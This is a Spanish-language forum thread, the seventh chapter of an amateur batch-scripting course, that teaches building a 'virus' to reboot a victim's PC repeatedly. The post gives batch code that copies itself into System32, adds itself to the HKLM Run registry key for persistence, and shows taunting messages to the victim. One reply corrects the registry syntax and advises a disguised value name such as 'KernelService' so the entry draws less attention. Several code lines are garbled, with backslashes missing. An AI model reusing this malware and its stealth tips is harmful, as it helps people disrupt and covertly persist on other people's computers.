APRENDER Un POCO DE .BAT

  • Iniciador del tema Iniciador del tema virox
  • Fecha de inicio Fecha de inicio
CAPITULO 7: CONTINUACION DE LA CREACION DE VIRUS
ya ... cauro..aqui lo ultimo de este pekeño cursito :P

Teniendo mas o menos claros lo del tema anterior en estese intentara explicar de la forma mas clara posible como hacer que el virus se quede en run para que se ejecute al arrancar, y algunas cosillas mas...

Podemos crear un virus que se ejecute, haga su funcion y ya esta...
o podemos crear un virus, que se guarte en la PC y se ejecute con esta cada vez que se inicie...

Como podemos ver el daño no es igual...

imaginen este virus:
@echo off
shutdown -r -f -t 5
exit

Lo que ara sera reiniciar la PC a los 5 segundos, y ya esta.... no volvera a acerlo a no ser q la victima lo vuelva a ejecutar...

Pero imaginen que este virus se inicia cuando encendemos el PC... osea, el solito... entonces ya joderia algo mas no?

Pues bien, esto es lo que voy a intentar explicar.

1º Devemos acer que nuestro virus se cree en algun directorio

2º Añadirlo al registo, (a run)

3º Esto ya es opcional, podemos hacer q se ejecute, o poner algo en el bat... etc

Bueno, en primel lugar, comenzaremos como siempre

@echo off

A continuacion, deveremos ir al directorio donde queremos que se qede nuestro virus, por ejemplo C: o System32 o Windows... etc

Si queremos que se guarde en c: basta con escrivir tan solo cd

@echo off
cd

Si por ejemplo queremos q se guarde en System32, pues ariamos:

@echo off
cd c:windowssystem32
Y de esta forma igual con cualquier otro directorio....

Pues bien, imaginemos q lo guardamos en System32, pues aora deveremos crear un bat completo en system32... es decir... crear uno desde el principio, apartir de este...

Lo veran mejor con el siguiente ejemplo
@echo off
cd c:windowssystem32
echo @echo off > virus.bat
echo
shutdown -r -s -t 5 >> virus.bat
echo exit >> virus.bat
exit

Entienden lo que emos echo no?? si an seguido el manual desde el principio, entenderan el porqe del > y del >>.

Por si no lo saben se lo explico brebemente:

El > sirve para crear o remplazar un archivo, y el >> para escribir en la linea siguiente.

Una vez echo esto, ya tendremos nuestro virus.bat en la carpeta system32. Ahora solo nos queda añadirlo a RUN para q se inicie con windows...
Para ello añadiremos lo siguiente:

reg add hkey_local_machine\software\microsoft\windows\currentversion\run/v virus.bat/t reg_sz /d C:\windows\system32 /f
Como veran, donde pone virus.bat, es el nombre que le emos dado, y poco mas adelante aparece la ruta C:\windows\system32.
Si hubiesemos dado otro nombre o otra ruta, solo seria modificarlo.

Asi que de momento nuestro virus iria asi:

Como veran, donde pone virus.bat, es el nombre que le emos dado, y poco mas adelante aparece la ruta C:windowssystem32.
Si hubiesemos dado otro nombre o otra ruta, solo seria modificarlo.

Asi que de momento nuestro virus iria asi:

pues con eso :P tan dao komo pekeña cosa molestosa
_____________________________________
Ahora podriamos poner algun mensaje y tambien ejecutar el bat...

Por ejemplo asi:
virus.bat/t reg_sz /d C:windowssystem32 /f
msg * Estas perdido amigo
msg
* Ahora UN conocido TUIO domina tu pc
msg * jajaja
start
c:windowssystem32virus.bat
exit

ya po..solo ,,,,,queda usar su imaginacion!!! su ingenio :::

conbinen lo ya dixo y ... prueben en sus PC XD ajhasasjdas para senciorarse :P

cualqer cosa si se les va de las manos su RS (restaurar sistema)

saludos!!

Ladoscuro:

depe... .....

LEan el tuto! ::completo!! .... por si surgen DUDAS
 
mira en el capitulo 2 pusiste set/p y en el tres pusiste set/a...cual es la diferencia?
 
Cita:
@echo off
title ejemplo4
color 5e
set/p nombre= ¿como te llamas?
echo.
pause
echo.
set/p edad= ¿y cuantos años tienes?
echo.
pause
echo.
set/p vive= ¿y donde vives?
echo.
pause
cls
color 2f
echo te llamas %nombre% y tienes %edad% años y vives en %vive%
echo.
pause > nul
exit

quiero preguntar algo...
en este ejemplo no seria nesesario poner

set/a edad = ¿y cuantos años tienes?

o me equivoco.

algo mas...

no me queda nada claro lo de los registros...

Comandos del registro

Operaciones:

REG QUERY /?
REG ADD /?
REG DELETE /?
REG COPY /?
REG SAVE /?
REG RESTORE /?
REG LOAD /?
REG UNLOAD /?
REG COMPARE /?
REG EXPORT /?
REG IMPORT /?


los ejecute en la consola para ver la ayuda pero aun asi no entiendo muy bien...


reg add hkey_local_machine\software\microsoft\windows\curr entversion\run/v virus.bat/t reg_sz /d C:\windows\system32 /f

esta linea que saque de uno de los ejemplos...
la cual me confunde mucho
espero que me los puedas explicar mejor...

saludos.



 
perro gracias por el aporte
cuando tenga tiempo lo leere y aplicare
toy muy ocupado con java por ahora
saludos y gracias ;)
 
estimado primero que todo... deseo felicitarlo por su tutorial de BATCH :) excelente... espero poder aportar tanto como ud. para hacer una seccion cada vez mas completa :D

ahora bien
[...]
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun/v virus.bat/t reg_sz /d C:windowssystem32 /f
Como veran, donde pone virus.bat, es el nombre que le emos dado, y poco mas adelante aparece la ruta C:windowssystem32.
Si hubiesemos dado otro nombre o otra ruta, solo seria modificarlo.
[...]

respecto a esta seccion si mal no recuerdo la sixtaxis de la sentencia si bien esta bien falla en ciertas secciones cito y declaro posible solucion en caso de que yo este erroneo disculpe las posibles molestias causadas D:

hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun/

asumire que es error de teclado pero si mal no recuerdo la sentencia correcta es:

Código:
HKLM/Software/Microsoft/Windows/CurrentVersion/Run
ahora en:
el valor del presente es el nombre que identificara al valor del registro. por lo tanto el nombre de este debe ser menos "llamativo" es decir es el identificador del mismo mas no sifnifica l nombre del fichero

ejemplo
Código:
/v KernelService
y como ultimo detalle:
/d C:windowssystem32
aqui deberia ir la ruta + el nombre del archivo a abrir, sino, al ejecutarse simplemente abriria la carpeta en si mas no el archivo que se desea abrir D:

es decir:
Código:
/d C:\Windows\System32\Virus.bat
espero este bien el aporte sino... me tiro a un pozo D:

saludos :D